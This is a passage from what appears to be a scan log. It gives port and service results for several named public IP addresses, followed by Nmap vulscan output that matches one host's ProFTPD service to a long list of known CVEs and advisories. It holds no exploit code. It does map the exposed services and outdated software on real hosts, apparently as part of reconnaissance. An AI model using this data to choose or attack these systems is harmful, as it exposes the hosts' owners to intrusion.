274393.174.93.84 139 udp netbios-ssn unknown
274493.174.93.84 161 tcp snmp filtered
274593.174.93.84 161 udp snmp unknown
274693.174.93.84 162 tcp snmptrap filtered
274793.174.93.84 162 udp snmptrap unknown
274893.174.93.84 389 tcp ldap filtered
274993.174.93.84 389 udp ldap filtered
275093.174.93.84 445 tcp microsoft-ds closed
275193.174.93.84 520 tcp efs filtered
275293.174.93.84 520 udp route unknown
275393.174.93.84 2049 tcp nfs filtered
275493.174.93.84 2049 udp nfs unknown
2755163.247.52.17 25 tcp smtp closed
2756163.247.52.17 53 tcp domain filtered
2757163.247.52.17 53 udp domain unknown
2758163.247.52.17 67 tcp dhcps filtered
2759163.247.52.17 67 udp dhcps unknown
2760163.247.52.17 68 tcp dhcpc filtered
2761163.247.52.17 68 udp dhcpc unknown
2762163.247.52.17 69 tcp tftp filtered
2763163.247.52.17 69 udp tftp unknown
2764163.247.52.17 80 tcp http open Apache httpd
2765163.247.52.17 88 tcp kerberos-sec filtered
2766163.247.52.17 88 udp kerberos-sec unknown
2767163.247.52.17 113 tcp ident closed
2768163.247.52.17 123 tcp ntp filtered
2769163.247.52.17 123 udp ntp unknown
2770163.247.52.17 137 tcp netbios-ns filtered
2771163.247.52.17 137 udp netbios-ns filtered
2772163.247.52.17 138 tcp netbios-dgm filtered
2773163.247.52.17 138 udp netbios-dgm filtered
2774163.247.52.17 139 tcp netbios-ssn closed
2775163.247.52.17 139 udp netbios-ssn unknown
2776163.247.52.17 161 tcp snmp filtered
2777163.247.52.17 161 udp snmp unknown
2778163.247.52.17 162 tcp snmptrap filtered
2779163.247.52.17 162 udp snmptrap unknown
2780163.247.52.17 389 tcp ldap filtered
2781163.247.52.17 389 udp ldap unknown
2782163.247.52.17 443 tcp ssl/https open
2783163.247.52.17 445 tcp microsoft-ds closed
2784163.247.52.17 520 tcp efs filtered
2785163.247.52.17 520 udp route unknown
2786163.247.52.17 2049 tcp nfs filtered
2787163.247.52.17 2049 udp nfs unknown
2788163.247.96.10 25 tcp smtp closed
2789163.247.96.10 53 tcp domain filtered
2790163.247.96.10 53 udp domain unknown
2791163.247.96.10 67 tcp dhcps filtered
2792163.247.96.10 67 udp dhcps unknown
2793163.247.96.10 68 tcp dhcpc filtered
2794163.247.96.10 68 udp dhcpc unknown
2795163.247.96.10 69 tcp tftp filtered
2796163.247.96.10 69 udp tftp unknown
2797163.247.96.10 80 tcp http open Apache httpd 2.2.22
2798163.247.96.10 88 tcp kerberos-sec filtered
2799163.247.96.10 88 udp kerberos-sec unknown
2800163.247.96.10 113 tcp ident closed
2801163.247.96.10 123 tcp ntp filtered
2802163.247.96.10 123 udp ntp unknown
2803163.247.96.10 137 tcp netbios-ns filtered
2804163.247.96.10 137 udp netbios-ns filtered
2805163.247.96.10 138 tcp netbios-dgm filtered
2806163.247.96.10 138 udp netbios-dgm filtered
2807163.247.96.10 139 tcp netbios-ssn closed
2808163.247.96.10 139 udp netbios-ssn unknown
2809163.247.96.10 161 tcp snmp filtered
2810163.247.96.10 161 udp snmp unknown
2811163.247.96.10 162 tcp snmptrap filtered
2812163.247.96.10 162 udp snmptrap unknown
2813163.247.96.10 389 tcp ldap filtered
2814163.247.96.10 389 udp ldap unknown
2815163.247.96.10 445 tcp microsoft-ds closed
2816163.247.96.10 465 tcp ssl/smtp open Exim smtpd 4.X
2817163.247.96.10 520 tcp efs filtered
2818163.247.96.10 520 udp route unknown
2819163.247.96.10 587 tcp smtp open Exim smtpd
2820163.247.96.10 2000 tcp cisco-sccp open
2821163.247.96.10 2049 tcp nfs filtered
2822163.247.96.10 2049 udp nfs unknown
2823163.247.96.10 4443 tcp http open Apache httpd
2824163.247.96.10 5060 tcp sip open
2825170.246.172.178 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 2 of 50 allowed.\x0d\x0a220-Local time is now 23:38. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
2826170.246.172.178 25 tcp smtp closed
2827170.246.172.178 53 tcp domain open PowerDNS Authoritative Server 4.1.10
2828170.246.172.178 53 udp domain open PowerDNS Authoritative Server 4.1.10
2829170.246.172.178 67 tcp dhcps filtered
2830170.246.172.178 67 udp dhcps unknown
2831170.246.172.178 68 tcp dhcpc filtered
2832170.246.172.178 68 udp dhcpc unknown
2833170.246.172.178 69 tcp tftp filtered
2834170.246.172.178 69 udp tftp unknown
2835170.246.172.178 88 tcp kerberos-sec filtered
2836170.246.172.178 88 udp kerberos-sec unknown
2837170.246.172.178 123 tcp ntp filtered
2838170.246.172.178 123 udp ntp unknown
2839170.246.172.178 137 tcp netbios-ns filtered
2840170.246.172.178 137 udp netbios-ns filtered
2841170.246.172.178 138 tcp netbios-dgm filtered
2842170.246.172.178 138 udp netbios-dgm filtered
2843170.246.172.178 139 tcp netbios-ssn closed
2844170.246.172.178 139 udp netbios-ssn unknown
2845170.246.172.178 161 tcp snmp filtered
2846170.246.172.178 161 udp snmp unknown
2847170.246.172.178 162 tcp snmptrap filtered
2848170.246.172.178 162 udp snmptrap unknown
2849170.246.172.178 389 tcp ldap filtered
2850170.246.172.178 389 udp ldap unknown
2851170.246.172.178 445 tcp microsoft-ds closed
2852170.246.172.178 520 tcp efs filtered
2853170.246.172.178 520 udp route unknown
2854170.246.172.178 2049 tcp nfs filtered
2855170.246.172.178 2049 udp nfs unknown
2856185.68.93.22 22 tcp ssh open SSH-2.0-OpenSSH_5.3
2857185.68.93.22 53 tcp domain closed
2858185.68.93.22 53 udp domain unknown
2859185.68.93.22 67 tcp dhcps closed
2860185.68.93.22 67 udp dhcps closed
2861185.68.93.22 68 tcp dhcpc closed
2862185.68.93.22 68 udp dhcpc closed
2863185.68.93.22 69 tcp tftp closed
2864185.68.93.22 69 udp tftp unknown
2865185.68.93.22 88 tcp kerberos-sec closed
2866185.68.93.22 88 udp kerberos-sec unknown
2867185.68.93.22 123 tcp ntp closed
2868185.68.93.22 123 udp ntp closed
2869185.68.93.22 137 tcp netbios-ns closed
2870185.68.93.22 137 udp netbios-ns filtered
2871185.68.93.22 138 tcp netbios-dgm closed
2872185.68.93.22 138 udp netbios-dgm filtered
2873185.68.93.22 139 tcp netbios-ssn closed
2874185.68.93.22 139 udp netbios-ssn closed
2875185.68.93.22 161 tcp snmp closed
2876185.68.93.22 161 udp snmp unknown
2877185.68.93.22 162 tcp snmptrap closed
2878185.68.93.22 162 udp snmptrap closed
2879185.68.93.22 389 tcp ldap closed
2880185.68.93.22 389 udp ldap unknown
2881185.68.93.22 520 tcp efs closed
2882185.68.93.22 520 udp route unknown
2883185.68.93.22 2049 tcp nfs closed
2884185.68.93.22 2049 udp nfs closed
2885186.67.91.110 25 tcp smtp closed
2886186.67.91.110 53 tcp domain filtered
2887186.67.91.110 53 udp domain unknown
2888186.67.91.110 67 tcp dhcps filtered
2889186.67.91.110 67 udp dhcps unknown
2890186.67.91.110 68 tcp dhcpc filtered
2891186.67.91.110 68 udp dhcpc unknown
2892186.67.91.110 69 tcp tftp filtered
2893186.67.91.110 69 udp tftp unknown
2894186.67.91.110 80 tcp http-proxy open F5 BIG-IP load balancer http proxy
2895186.67.91.110 88 tcp kerberos-sec filtered
2896186.67.91.110 88 udp kerberos-sec unknown
2897186.67.91.110 123 tcp ntp filtered
2898186.67.91.110 123 udp ntp unknown
2899186.67.91.110 137 tcp netbios-ns filtered
2900186.67.91.110 137 udp netbios-ns filtered
2901186.67.91.110 138 tcp netbios-dgm filtered
2902186.67.91.110 138 udp netbios-dgm filtered
2903186.67.91.110 139 tcp netbios-ssn closed
2904186.67.91.110 139 udp netbios-ssn unknown
2905186.67.91.110 161 tcp snmp filtered
2906186.67.91.110 161 udp snmp unknown
2907186.67.91.110 162 tcp snmptrap filtered
2908186.67.91.110 162 udp snmptrap unknown
2909186.67.91.110 389 tcp ldap filtered
2910186.67.91.110 389 udp ldap unknown
2911186.67.91.110 443 tcp ssl/https open
2912186.67.91.110 445 tcp microsoft-ds closed
2913186.67.91.110 520 tcp efs filtered
2914186.67.91.110 520 udp route unknown
2915186.67.91.110 2049 tcp nfs filtered
2916186.67.91.110 2049 udp nfs unknown
2917194.18.73.2 25 tcp smtp closed
2918194.18.73.2 53 tcp domain filtered
2919194.18.73.2 53 udp domain unknown
2920194.18.73.2 67 tcp dhcps filtered
2921194.18.73.2 67 udp dhcps unknown
2922194.18.73.2 68 tcp dhcpc filtered
2923194.18.73.2 68 udp dhcpc unknown
2924194.18.73.2 69 tcp tftp filtered
2925194.18.73.2 69 udp tftp unknown
2926194.18.73.2 80 tcp http-proxy open HAProxy http proxy 1.3.1 or later
2927194.18.73.2 88 tcp kerberos-sec filtered
2928194.18.73.2 88 udp kerberos-sec unknown
2929194.18.73.2 113 tcp ident closed
2930194.18.73.2 123 tcp ntp filtered
2931194.18.73.2 123 udp ntp unknown
2932194.18.73.2 137 tcp netbios-ns filtered
2933194.18.73.2 137 udp netbios-ns filtered
2934194.18.73.2 138 tcp netbios-dgm filtered
2935194.18.73.2 138 udp netbios-dgm filtered
2936194.18.73.2 139 tcp netbios-ssn closed
2937194.18.73.2 139 udp netbios-ssn unknown
2938194.18.73.2 161 tcp snmp filtered
2939194.18.73.2 161 udp snmp unknown
2940194.18.73.2 162 tcp snmptrap filtered
2941194.18.73.2 162 udp snmptrap unknown
2942194.18.73.2 389 tcp ldap filtered
2943194.18.73.2 389 udp ldap unknown
2944194.18.73.2 443 tcp ssl/http-proxy open HAProxy http proxy 1.3.1 or later
2945194.18.73.2 445 tcp microsoft-ds closed
2946194.18.73.2 520 tcp efs filtered
2947194.18.73.2 520 udp route closed
2948194.18.73.2 2049 tcp nfs filtered
2949194.18.73.2 2049 udp nfs unknown
2950194.39.164.140 21 tcp ftp open ProFTPD
2951194.39.164.140 53 tcp domain filtered
2952194.39.164.140 53 udp domain unknown
2953194.39.164.140 67 tcp dhcps filtered
2954194.39.164.140 67 udp dhcps unknown
2955194.39.164.140 68 tcp dhcpc filtered
2956194.39.164.140 68 udp dhcpc unknown
2957194.39.164.140 69 tcp tftp filtered
2958194.39.164.140 69 udp tftp unknown
2959194.39.164.140 80 tcp http open nginx
2960194.39.164.140 88 tcp kerberos-sec filtered
2961194.39.164.140 88 udp kerberos-sec unknown
2962194.39.164.140 110 tcp pop3 open Courier pop3d
2963194.39.164.140 123 tcp ntp filtered
2964194.39.164.140 123 udp ntp unknown
2965194.39.164.140 137 tcp netbios-ns filtered
2966194.39.164.140 137 udp netbios-ns filtered
2967194.39.164.140 138 tcp netbios-dgm filtered
2968194.39.164.140 138 udp netbios-dgm filtered
2969194.39.164.140 139 tcp netbios-ssn closed
2970194.39.164.140 139 udp netbios-ssn unknown
2971194.39.164.140 161 tcp snmp filtered
2972194.39.164.140 161 udp snmp unknown
2973194.39.164.140 162 tcp snmptrap filtered
2974194.39.164.140 162 udp snmptrap unknown
2975194.39.164.140 389 tcp ldap filtered
2976194.39.164.140 389 udp ldap unknown
2977194.39.164.140 443 tcp ssl/http open nginx
2978194.39.164.140 465 tcp ssl/smtps open
2979194.39.164.140 520 tcp efs filtered
2980194.39.164.140 520 udp route unknown
2981194.39.164.140 587 tcp smtp open Postfix smtpd
2982194.39.164.140 993 tcp ssl/imaps open
2983194.39.164.140 2020 tcp ssh open OpenSSH 7.4 protocol 2.0
2984194.39.164.140 2049 tcp nfs filtered
2985194.39.164.140 2049 udp nfs unknown
2986194.39.164.140 8443 tcp ssl/https-alt open sw-cp-server
2987194.39.164.140 8880 tcp http open sw-cp-server httpd Plesk Onyx 17.8.11
2988200.35.157.77 53 tcp domain filtered
2989200.35.157.77 53 udp domain unknown
2990200.35.157.77 67 tcp dhcps filtered
2991200.35.157.77 67 udp dhcps unknown
2992200.35.157.77 68 tcp dhcpc filtered
2993200.35.157.77 68 udp dhcpc unknown
2994200.35.157.77 69 tcp tftp filtered
2995200.35.157.77 69 udp tftp unknown
2996200.35.157.77 88 tcp kerberos-sec filtered
2997200.35.157.77 88 udp kerberos-sec unknown
2998200.35.157.77 123 tcp ntp filtered
2999200.35.157.77 123 udp ntp unknown
3000200.35.157.77 137 tcp netbios-ns filtered
3001200.35.157.77 137 udp netbios-ns filtered
3002200.35.157.77 138 tcp netbios-dgm filtered
3003200.35.157.77 138 udp netbios-dgm filtered
3004200.35.157.77 139 tcp netbios-ssn closed
3005200.35.157.77 139 udp netbios-ssn unknown
3006200.35.157.77 161 tcp snmp filtered
3007200.35.157.77 161 udp snmp unknown
3008200.35.157.77 162 tcp snmptrap filtered
3009200.35.157.77 162 udp snmptrap unknown
3010200.35.157.77 389 tcp ldap filtered
3011200.35.157.77 389 udp ldap unknown
3012200.35.157.77 520 tcp efs filtered
3013200.35.157.77 520 udp route unknown
3014200.35.157.77 2049 tcp nfs filtered
3015200.35.157.77 2049 udp nfs unknown
3016201.131.38.40 25 tcp smtp closed
3017201.131.38.40 53 tcp domain filtered
3018201.131.38.40 53 udp domain unknown
3019201.131.38.40 67 tcp dhcps filtered
3020201.131.38.40 67 udp dhcps unknown
3021201.131.38.40 68 tcp dhcpc filtered
3022201.131.38.40 68 udp dhcpc unknown
3023201.131.38.40 69 tcp tftp filtered
3024201.131.38.40 69 udp tftp unknown
3025201.131.38.40 80 tcp http open Apache httpd
3026201.131.38.40 88 tcp kerberos-sec filtered
3027201.131.38.40 88 udp kerberos-sec unknown
3028201.131.38.40 123 tcp ntp filtered
3029201.131.38.40 123 udp ntp unknown
3030201.131.38.40 137 tcp netbios-ns filtered
3031201.131.38.40 137 udp netbios-ns filtered
3032201.131.38.40 138 tcp netbios-dgm filtered
3033201.131.38.40 138 udp netbios-dgm filtered
3034201.131.38.40 139 tcp netbios-ssn closed
3035201.131.38.40 139 udp netbios-ssn unknown
3036201.131.38.40 161 tcp snmp filtered
3037201.131.38.40 161 udp snmp unknown
3038201.131.38.40 162 tcp snmptrap filtered
3039201.131.38.40 162 udp snmptrap unknown
3040201.131.38.40 389 tcp ldap filtered
3041201.131.38.40 389 udp ldap unknown
3042201.131.38.40 443 tcp ssl/http open Apache httpd
3043201.131.38.40 445 tcp microsoft-ds closed
3044201.131.38.40 520 tcp efs filtered
3045201.131.38.40 520 udp route unknown
3046201.131.38.40 2049 tcp nfs filtered
3047201.131.38.40 2049 udp nfs unknown
3048217.160.131.142 21 tcp ftp open ProFTPD
3049217.160.131.142 22 tcp ssh open OpenSSH 5.3 protocol 2.0
3050217.160.131.142 53 tcp domain closed
3051217.160.131.142 53 udp domain unknown
3052217.160.131.142 67 tcp dhcps closed
3053217.160.131.142 67 udp dhcps unknown
3054217.160.131.142 68 tcp dhcpc closed
3055217.160.131.142 68 udp dhcpc closed
3056217.160.131.142 69 tcp tftp closed
3057217.160.131.142 69 udp tftp unknown
3058217.160.131.142 80 tcp http open Apache httpd PleskLin
3059217.160.131.142 88 tcp kerberos-sec closed
3060217.160.131.142 88 udp kerberos-sec unknown
3061217.160.131.142 123 tcp ntp closed
3062217.160.131.142 123 udp ntp unknown
3063217.160.131.142 137 tcp netbios-ns closed
3064217.160.131.142 137 udp netbios-ns filtered
3065217.160.131.142 138 tcp netbios-dgm closed
3066217.160.131.142 138 udp netbios-dgm filtered
3067217.160.131.142 139 tcp netbios-ssn closed
3068217.160.131.142 139 udp netbios-ssn closed
3069217.160.131.142 161 tcp snmp closed
3070217.160.131.142 161 udp snmp unknown
3071217.160.131.142 162 tcp snmptrap closed
3072217.160.131.142 162 udp snmptrap closed
3073217.160.131.142 389 tcp ldap closed
3074217.160.131.142 389 udp ldap closed
3075217.160.131.142 443 tcp ssl/http open Apache httpd PleskLin
3076217.160.131.142 520 tcp efs closed
3077217.160.131.142 520 udp route unknown
3078217.160.131.142 2049 tcp nfs closed
3079217.160.131.142 2049 udp nfs closed
3080217.160.131.142 3306 tcp mysql open MySQL 5.1.73
3081217.160.131.142 4643 tcp ssl/http open Apache httpd
3082217.160.131.142 8443 tcp ssl/http open sw-cp-server httpd Plesk Onyx 17.8.11
3083217.160.131.142 8880 tcp http open sw-cp-server httpd Plesk Onyx 17.8.11
3084#####################################################################################################################################
3085Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-05 03:32 EST
3086Nmap scan report for s18161039.onlinehome-server.info (217.160.131.142)
3087Host is up (0.14s latency).
3088Not shown: 994 closed ports
3089PORT STATE SERVICE VERSION
309021/tcp open ftp ProFTPD
3091| vulscan: VulDB - https://vuldb.com:
3092| [138380] ProFTPD 1.3.5b mod_copy Code Execution
3093| [81624] ProFTPD up to 1.3.5a/1.3.6rc1 mod_tls mod_tls.c weak encryption
3094| [75436] ProFTPD 1.3.4e/1.3.5 mod_copy File privilege escalation
3095| [10259] ProFTPD 1.3.4/1.3.5 mod_sftp/mod_sftp_pam kbdint.c resp_count denial of service
3096| [7244] ProFTPD up to 1.3.4 MKD/XMKD Command race condition
3097| [59589] ProFTPD up to 1.3.3 Use-After-Free memory corruption
3098| [4290] ProFTPD up to 1.3.3 mod_sftpd Big Payload denial of service
3099| [56304] ProFTPD up to 1.3.3 contrib/mod_sql.c) sql_prepare_where memory corruption
3100| [56042] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
3101| [56041] GNU C Library up to 2.12.2 proftpd.gnu.c denial of service
3102| [55410] ProFTPD 1.3.2/1.3.3 Telnet netio.c pr_netio_telnet_gets memory corruption
3103| [55403] ProFTPD 1.2.10/1.3.0/1.3.1/1.3.2/1.3.3 mod_site_misc Symlink directory traversal
3104| [55392] ProFTPD up to 1.3.2 pr_data_xfer denial of service
3105| [50631] ProFTPD 1.3.1/1.3.2/1.3.3 mod_tls unknown vulnerability
3106| [46500] ProFTPD 1.3.1 mod_sql_mysql sql injection
3107| [46499] ProFTPD 1.3.1/1.3.2/1.3.2 Rc2 mod_sql sql injection
3108| [44191] ProFTPD 1.3.1 FTP Command cross site request forgery
3109| [36309] ProFTPD 1.3.0 Rc1 mod_sql Plaintext unknown vulnerability
3110| [2747] ProFTPD 1.3.0/1.3.0a mod_ctrls pr_ctrls_recv_request memory corruption
3111| [33495] ProFTPD 1.3.0a Configuration File affected denial of service
3112| [2711] ProFTPD 1.3.0a mod_tls tls_x509_name_oneline memory corruption
3113| [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
3114|
3115| MITRE CVE - https://cve.mitre.org:
3116| [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
3117| [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
3118| [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
3119| [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
3120| [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652.
3121| [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
3122| [CVE-2010-4052] Stack consumption vulnerability in the regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (resource exhaustion) via a regular expression containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD.
3123| [CVE-2010-4051] The regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (application crash) via a regular expression containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation, as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD, related to a "RE_DUP_MAX overflow."
3124| [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
3125| [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
3126| [CVE-2009-0919] XAMPP installs multiple packages with insecure default passwords, which makes it easier for remote attackers to obtain access via (1) the "lampp" default password for the "nobody" account within the included ProFTPD installation, (2) a blank default password for the "root" account within the included MySQL installation, (3) a blank default password for the "pma" account within the phpMyAdmin installation, and possibly other unspecified passwords. NOTE: this was originally reported as a problem in DFLabs PTK, but this issue affects any product that is installed within the XAMPP environment, and should not be viewed as a vulnerability within that product. NOTE: DFLabs states that PTK is intended for use in a laboratory with "no contact from / to internet."
3127| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
3128| [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
3129| [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
3130| [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
3131| [CVE-2007-2165] The Auth API in ProFTPD before 20070417, when multiple simultaneous authentication modules are configured, does not require that the module that checks authentication is the same as the module that retrieves authentication data, which might allow remote attackers to bypass authentication, as demonstrated by use of SQLAuthTypes Plaintext in mod_sql, with data retrieved from /etc/passwd.
3132| [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
3133| [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
3134| [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
3135| [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
3136| [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
3137| [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
3138| [CVE-2005-0484] Format string vulnerability in gprostats for GProFTPD before 8.1.9 may allow remote attackers to execute arbitrary code via an FTP transfer with a crafted filename that causes format string specifiers to be inserted into the ProFTPD transfer log.
3139| [CVE-2004-1602] ProFTPD 1.2.x, including 1.2.8 and 1.2.10, responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.
3140| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
3141| [CVE-2004-0432] ProFTPD 1.2.9 treats the Allow and Deny directives for CIDR based ACL entries as if they were AllowAll, which could allow FTP clients to bypass intended access restrictions.
3142| [CVE-2004-0346] Off-by-one buffer overflow in _xlate_ascii_write() in ProFTPD 1.2.7 through 1.2.9rc2p allows local users to gain privileges via a 1024 byte RETR command.
3143| [CVE-2003-0831] ProFTPD 1.2.7 through 1.2.9rc2 does not properly translate newline characters when transferring files in ASCII mode, which allows remote attackers to execute arbitrary code via a buffer overflow using certain files.
3144| [CVE-2003-0500] SQL injection vulnerability in the PostgreSQL authentication module (mod_sql_postgres) for ProFTPD before 1.2.9rc1 allows remote attackers to execute arbitrary SQL and gain privileges by bypassing authentication or stealing passwords via the USER name.
3145| [CVE-2001-1501] The glob functionality in ProFTPD 1.2.1, and possibly other versions allows remote attackers to cause a denial of service (CPU and memory consumption) via commands with large numbers of wildcard and other special characters, as demonstrated using an ls command with multiple (1) "*/..", (2) "*/.*", or (3) ".*./*?/" sequences in the argument.
3146| [CVE-2001-1500] ProFTPD 1.2.2rc2, and possibly other versions, does not properly verify reverse-resolved hostnames by performing forward resolution, which allows remote attackers to bypass ACLs or cause an incorrect client hostname to be logged.
3147| [CVE-2001-0456] postinst installation script for Proftpd in Debian 2.2 does not properly change the "run as uid/gid root" configuration when the user enables anonymous access, which causes the server to run at a higher privilege than intended.
3148| [CVE-2001-0318] Format string vulnerability in ProFTPD 1.2.0rc2 may allow attackers to execute arbitrary commands by shutting down the FTP server while using a malformed working directory (cwd).
3149| [CVE-2001-0136] Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed.
3150| [CVE-2001-0027] mod_sqlpw module in ProFTPD does not reset a cached password when a user uses the "user" command to change accounts, which allows authenticated attackers to gain privileges of other users.
3151| [CVE-2000-0574] FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly cleanse untrusted format strings that are used in the setproctitle function (sometimes called by set_proc_title), which allows remote attackers to cause a denial of service or execute arbitrary commands.
3152| [CVE-1999-1475] ProFTPd 1.2 compiled with the mod_sqlpw module records user passwords in the wtmp log file, which allows local users to obtain the passwords and gain privileges by reading wtmp, e.g. via the last command.
3153| [CVE-1999-0911] Buffer overflow in ProFTPD, wu-ftpd, and beroftpd allows remote attackers to gain root access via a series of MKD and CWD commands that create nested directories.
3154| [CVE-1999-0368] Buffer overflows in wuarchive ftpd (wu-ftpd) and ProFTPD lead to remote root access, a.k.a. palmetto.
3155|
3156| SecurityFocus - https://www.securityfocus.com/bid/:
3157| [97409] ProFTPD CVE-2017-7418 Local Security Bypass Vulnerability
3158| [89750] ProFTPD CVE-2001-1501 Denial-Of-Service Vulnerability
3159| [88575] ProFTPD CVE-2001-0027 Denial-Of-Service Vulnerability
3160| [84378] Proftpd CVE-2008-7265 Denial-Of-Service Vulnerability
3161| [84329] ProFTPD Out Of Bounds Multiple Memory Corruption Vulnerabilities
3162| [84327] ProFTPD CVE-2016-3125 Diffie Hellman Key Exchange Security Bypass Vulnerability
3163| [82756] ProFTPD CVE-2003-0500 SQL-Injection Vulnerability
3164| [82433] GProFTPD CVE-2005-0484 Remote Security Vulnerability
3165| [77684] ProFTPD Heap Buffer Overflow and Denial of Service Vulnerabilities
3166| [74238] ProFTPD CVE-2015-3306 Information Disclosure Vulnerabilities
3167| [62328] ProFTPD 'mod_sftp_pam' Remote Denial of Service Vulnerability
3168| [57172] ProFTPD Race Condition Local Privilege Escalation Vulnerability
3169| [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
3170| [46183] ProFTPD 'mod_sftp' Module Integer Overflow Vulnerability
3171| [45150] ProFTPD Backdoor Unauthorized Access Vulnerability
3172| [44933] ProFTPD 'mod_sql' Remote Heap Based Buffer Overflow Vulnerability
3173| [44562] ProFTPD Multiple Remote Vulnerabilities
3174| [36804] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
3175| [33722] ProFTPD 'mod_sql' Username SQL Injection Vulnerability
3176| [33650] ProFTPD Character Encoding SQL Injection Vulnerability
3177| [23546] ProFTPD AUTH Multiple Authentication Module Security Bypass Vulnerability
3178| [21587] ProFTPD Controls Module Local Buffer Overflow Vulnerability
3179| [21326] ProFTPD MOD_TLS Remote Buffer Overflow Vulnerability
3180| [20992] ProFTPD SReplace Remote Buffer Overflow Vulnerability
3181| [16535] ProFTPD Mod_Radius Buffer Overflow Vulnerability
3182| [14381] ProFTPD Shutdown Message Format String Vulnerability
3183| [14380] ProFTPD SQLShowInfo SQL Output Format String Vulnerability
3184| [12588] GProFTPD GProstats Remote Format String Vulnerability
3185| [11430] ProFTPD Authentication Delay Username Enumeration Vulnerability
